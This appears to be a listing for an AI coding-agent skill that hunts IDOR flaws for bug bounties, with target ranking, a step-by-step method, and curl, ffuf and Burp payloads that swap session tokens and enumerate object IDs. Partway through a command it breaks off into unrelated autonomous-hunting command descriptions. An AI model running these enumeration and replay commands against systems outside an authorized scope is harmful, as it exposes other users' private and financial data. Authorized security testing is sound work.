hunt-idor
Hunt-idor is a reconnaissance and exploitation skill for identifying Insecure Direct Object Reference vulnerabilities in web applications. Use this skill when testing APIs, web services, and multi-tenant platforms for authorization bypasses that expose user data, financial records, or administrative resources through predictable or sequential identifiers in URLs, GraphQL queries, or request parameters.
git clone --depth 1 https://github.com/elementalsouls/Claude-BugHunter /tmp/hunt-idor && cp -r /tmp/hunt-idor/skills/hunt-idor ~/.claude/skills/hunt-idorSKILL.md
## Crown Jewel Targets
**Why IDOR pays big:**
- Direct access to other users' data without authentication bypass — clear, demonstrable impact
- Chains easily with privilege escalation, financial fraud, and account takeover
- Affects virtually every application with user-owned resources
**Highest-value asset types (by payout potential):**
| Asset Type | Why It Pays |
|---|---|
| Financial documents / billing APIs | PII + financial data exposure (Shopify, Uber, PayPal) |
| Private repositories / source code | IP theft, critical data loss (GitHub) |
| User messages / DMs | Privacy violation at scale (Reddit) |
| Account management endpoints | User addition, deletion, privilege escalation (PayPal, Mozilla) |
| Business/org administration | Cross-tenant escalation, employee PII (Uber) |
| Content moderation/admin actions | Operational sabotage (Reddit mod logs) |
**Programs that pay most for IDOR:**
- Platforms with multi-tenancy (SaaS, B2B tools)
- Fintech and payment processors
- Social platforms with private content
- Developer tools with org/repo isolation
---
## Attack Surface Signals
**URL patterns that scream IDOR:**
```
/api/v1/users/{id}/
/api/v*/orders/{order_id}
/invoices/download?id=
/reports/{uuid}/
/messages/{thread_id}
/admin/orgs/{org_id}/members
/migration/{migration_id}/files
/graphql (query params with IDs)
/api/business/{business_id}/
/vouchers/{voucher_id}/policy
```
**Response header signals:**
- `Content-Type: application/json` on endpoints accepting raw IDs
- No `X-Frame-Options` or CORS misconfigs paired with ID params
- `Authorization: Bearer` tokens that are user-scoped but hit org-level resources
**JavaScript source patterns:**
```javascript
// Look for hardcoded or interpolated IDs in JS
fetch(`/api/v1/users/${userId}/profile`)
axios.get('/invoices/' + invoiceId)
graphql query { billingDocument(id: $docId) }
// Redux/state stores exposing foreign IDs
state.currentUser.organizationId
```
**Tech stack signals:**
- GraphQL endpoints (query-based IDORs are often missed)
- REST APIs with sequential integer IDs (most vulnerable)
- UUIDs that are predictable or leaked in other responses
- Multi-tenant SaaS apps with `org_id`, `account_id`, `business_id` params
- Mobile apps (Burp the APK — mobile APIs often skip authorization checks)
---
## Step-by-Step Hunting Methodology
1. **Map all object references in the application**
- Browse every feature authenticated as User A
- Capture all requests in Burp Suite
- Filter for requests containing: `id=`, `_id=`, `uuid=`, `/v1/{noun}/{id}`, query params with numeric/UUID values
2. **Enumerate ID types**
- Sequential integers → enumerate ±1, ±100
- UUIDs → check if they appear in other responses or JS files
- Hashed IDs → check if leaked in public endpoints, metadata, or GraphQL introspection
3. **Create two separate accounts (same privilege level)**
- User A: resource owner
- User B: attacker account
- Log all IDs belonging to User A while authenticated as User A
4. **Replay User A's resource IDs as User B**
- Replace session cookie/token with User B's credentials
- Send identical requests referencing User A's object IDs
- Test ALL HTTP verbs: GET, POST, PUT, PATCH, DELETE on each endpoint
5. **Test cross-tenant/cross-org scenarios**
- Create accounts in separate organizations/businesses
- Test if Org B's session can reference Org A's IDs
- Pay special attention to admin/management endpoints
6. **Test GraphQL specifically**
- Run introspection: `{ __schema { queryType { fields { name } } } }`
- For every query/mutation taking an `id` argument, substitute another user's ID
- Test both queries (read) and mutations (write/delete)
7. **Test write/destructive operations, not just reads**
- Can User B DELETE User A's resources?
- Can User B MODIFY User A's content?
- Can User B ADD themselves to User A's account?
8. **Chain IDORs together**
- Use one IDOR's leaked data (org IDs, user IDs) to fuel the next
- IDOR → leaked ID → second IDOR → privilege escalation
9. **Test state-changing edge cases**
- Expired tokens/invites that can still be accepted
- Race conditions on resource IDs
- Indirect references: `?sort=id` or `?filter[user_id]=`
10. **Document the exact differential**
- Confirm User B has NO legitimate access to User A's resource
- Screenshot/log the 200 OK vs expected 403/404
---
## Payload & Detection Patterns
**Basic IDOR test with curl (swap cookie/token):**
```bash
# Get User A's resource ID while authenticated as A
curl -s -H "Cookie: session=USER_A_SESSION" \
https://target.com/api/v1/invoices/12345
# Replay with User B's session
curl -s -H "Cookie: session=USER_B_SESSION" \
https://target.com/api/v1/invoices/12345
# Success = 200 OK with User A's data
```
**GraphQL IDOR test:**
```bash
curl -s -X POST https://target.com/graphql \
-H "Authorization: Bearer USER_B_TOKEN" \
-H "Content-Type: application/json" \
-d '{"query":"{ billingDocument(id: \"USER_A_DOC_ID\") { id amount pdfUrl } }"}'
```
**Enumerate sequential IDs with ffuf:**
```bash
ffuf -u "https://target.com/api/v1/orders/FUZZ" \
-w ids.txt \
-H "Authorization: Bearer USER_B_TOKEN" \
-mc 200 \
-o idor_results.json
```
**Generate sequential ID wordlist:**
```python
# Generate IDs around a known value
known_id = 48291
with open("ids.txt", "w") as f:
for i in range(known_id - 500, known_id + 500):
f.write(str(i) + "\n")
```
**Burp Intruder payload for IDOR scanning:**
```
GET /api/messages/§12345§ HTTP/1.1
Host: target.com
Authorization: Bearer USER_B_TOKEN
# Mark §12345§ as injection point
# Use numeric sequential payload: 12000-13000
# Filter responses by length difference or status 200
```
**JavaScript scraping for leaked IDs:**
```bash
# Find IDs in JS bundles
curl -s https://target.com/static/app.js | grep -Eo '"id":"[a-f0-9-]{36}"' | sort -u
# Find object references in API responses
curl -s -H "Cookie: sessionRun autonomous hunt loop on a target — scope check → recon → rank surface → hunt → validate → report with configurable checkpoints. Usage: /autopilot target.com [--paranoid|--normal|--yolo]
Build an exploit chain — given bug A, finds B and C to combine for higher severity and payout. Knows common chain patterns: IDOR→ATO, SSRF→cloud metadata, XSS→ATO, open redirect→OAuth theft, S3→bundle→secret→OAuth. Usage: /chain
Active vulnerability hunting. Two-track dispatcher — asks Red Team vs WAPT, hands off to hunt-dispatch skill and sibling commands. Usage: /hunt target.com | /hunt *.target.com | /hunt targets.txt [--vuln-class X] [--source-code P] [--chrome]
On-demand intelligence fetch for a target — CVEs, disclosed reports, new features. Wraps learn.py + hunt memory context. Usage: /intel target.com
Inspect or rotate hunt-memory JSONL files (audit.jsonl, patterns.jsonl, journal.jsonl). Caps file size and keeps N rotated backups so memory does not grow unbounded.
Pick up a previous hunt on a target — shows hunt history, untested endpoints, and memory-informed suggestions. Usage: /pickup target.com
Run full recon pipeline on a target — subdomain enum (Chaos API + subfinder), live host discovery (dnsx + httpx), URL crawl (katana + waybackurls + gau), gf pattern classification, nuclei scan. Outputs to recon/<target>/ directory. Usage: /recon target.com
Log current finding or successful pattern to hunt memory. Auto-fills from /validate output if available. Usage: /remember